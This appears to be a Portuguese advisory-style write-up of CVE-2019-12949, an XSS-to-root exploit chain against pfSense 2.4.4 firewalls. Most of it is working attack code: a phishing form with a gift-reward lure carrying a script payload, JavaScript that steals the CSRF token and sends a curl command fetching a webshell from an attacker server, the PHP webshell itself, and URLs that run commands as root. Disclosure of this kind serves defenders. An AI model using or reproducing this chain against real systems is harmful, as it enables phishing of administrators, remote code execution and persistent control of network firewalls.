
CVE-2019-12949
No pfSense 2.4.4-p2 e 2.4.4-p3, se for possível enganar o administrador autenticado para clicar em um botão em uma página de phishing, um atacante pode carregar código executável arbitrário via ding_command.php e rrd_fetch_json.php para um servidor. Em seguida, o atacante remoto pode executar qualquer comando com privilégios de root nesse servidor.
Pesquisador: Enter of The Tarantula Team, VinCSS (um membro da Vingroup)
Vetor de ataque: https://pfSense_IP_Address/rrd_fetch_json.php
Envie uma solicitação POST:
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post">
<input type="hidden" name="left" value="system-processor"><br>
<input type="hidden" name="right" value="null"><br>
<input type="hidden" name="start" value=""><br>
<input type="hidden" name="end" value=""><br>
<input type="hidden" name="resolution" value="300"><br>
<input type="hidden" name="timePeriod" value="i3i3j<script>alert(1)</script>tz9b1"><br>
<input type="hidden" name="graphtype" value="line"><br>
<input type="hidden" name="invert" value="true"><br>
<input type="hidden" name="refreshInterval" value="0">
<h1>Congratulations on receiving the reward from us</h1>
<h1>Click to receive gifts</h1>
<input type="submit" value="Submit">
</form>
O atacante pode criar um site de phishing como este para explorar a vulnerabilidade XSS no pfSense:
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post">
<input type="hidden" name="left" value="system-processor"><br>
<input type="hidden" name="right" value="null"><br>
<input type="hidden" name="start" value=""><br>
<input type="hidden" name="end" value=""><br>
<input type="hidden" name="resolution" value="300"><br>
<input type="hidden" name="timePeriod" value="i3i3j<script src='https://[Attacker-Server]/payload.js'></script>tz9b1"><br>
<input type="hidden" name="graphtype" value="line"><br>
<input type="hidden" name="invert" value="true"><br>
<input type="hidden" name="refreshInterval" value="0">
<h1>Congratulations on receiving the reward from us</h1>
<h1>Click to receive gifts</h1>
<input type="submit" value="Submit">
</form>
O arquivo payload.js no servidor do atacante conterá o seguinte código Javascript (Payload):
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://[PFsense domain]/diag_command.php", false);
xhr.withCredentials=true;
xhr.send(null);
var resp = xhr.responseText;
console.log(resp);
var start_idx = resp.indexOf('name=\'__csrf_magic\' value="');
var end_idx = resp.indexOf('" />', start_idx);
var token = resp.slice(start_idx + 27, end_idx);
console.log(token);
// now execute the CSRF attack using XHR along with the extracted token
var xhr1 = new XMLHttpRequest();
xhr1.open("POST", "https://[PFsense-domain]/diag_command.php", false);
xhr1.withCredentials=true;
var params = "__csrf_magic="+token+"&txtCommand=curl https://[Attacker-Server]/shell.txt > a.php&submit=EXEC";
xhr1.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr1.setRequestHeader("Content-length", params.length);
xhr1.send(params);
</script>
O arquivo shell.txt no servidor do atacante conterá qualquer conteúdo de webshell PHP, como este:
<?php
system($_REQUEST['cmd']); // allow remote attacker to run commands on victim server
phpinfo(); // show phpinfo
?>
Por fim, o atacante enganará os administradores autenticados do pfSense (vítima) para acessarem o site de phishing e clicarem no botão 'Submit' no site de phishing. Então a vítima será redirecionada para o site administrativo do pfSense, e o webshell do atacante será automaticamente carregado com sucesso no servidor pfSense.
A partir daí, o atacante remoto pode executar código arbitrário como root no servidor pfSense:
https://[PFsense-domain]/a.php?cmd=whoami
https://[PFsense-domain]/a.php?cmd=ls